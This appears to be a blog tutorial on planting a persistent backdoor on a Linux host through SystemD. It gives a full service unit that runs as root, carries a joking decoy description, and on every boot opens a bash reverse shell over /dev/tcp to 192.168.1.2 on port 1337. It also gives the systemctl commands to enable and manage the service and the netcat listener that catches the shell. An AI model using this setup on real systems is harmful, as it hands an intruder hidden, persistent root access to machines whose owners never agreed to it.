SystemD backdoor

Image by PublicDomainPictures on Pixabay

Image by PublicDomainPictures on Pixabay

Some programs are nice to start every time the system boots. The use cases can vary from web services to persistent malware. Your imagination is the limitation.

In this article, I will provide a simple method of creating a simple backdoor service that is managed by SystemD on a Linux host.

Reverse Shell Service

Persistent access to remote host

Do you ever find yourself in a situation where it would be nice to have persistent access to a remote host even after it reboots? Well, then a SystemD service is a simple means to that end.

To get this working you will need to have root-level permissions on the host.

Start off by creating a service definition file that you store somewhere on the system. In this example, we place it in the /tmp directory.

vim /tmp/root4you.service
/tmp/root4you.service
[Unit]
Description=This is not the evil service you are looking for...

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/1337 0>&1'

[Install]
WantedBy=multi-user.target

This file will be used to add a entry to SystemD. To add the service to SystemD, and enable it to be executed at system startup run this command:

systemctl enable /tmp/root4you.service

Once the service is added to SystemD, the file is no longer needed.

The service will start a reverse shell that will try to connect to the IP address 192.168.1.2, on port 1337. To establish a reverse shell the host using that IP address must have Netcat listening for a reverse shell on the same port.

nc -nlvp 1337

Manage service

Start, Stop and Status

Now this service can be managed just like any other SystemD managed service with these commands:

systemctl start root4you
systemctl stop root4you
systemctl status root4you

Since the service is enabled in SystemD it will start the next time the host boots. But right now it is not running. To start the service, and to test its functionality you will need to start it manually.

Removal

Clean up the mess

To remove the service from SystemD, simply disable it

systemctl disable root4you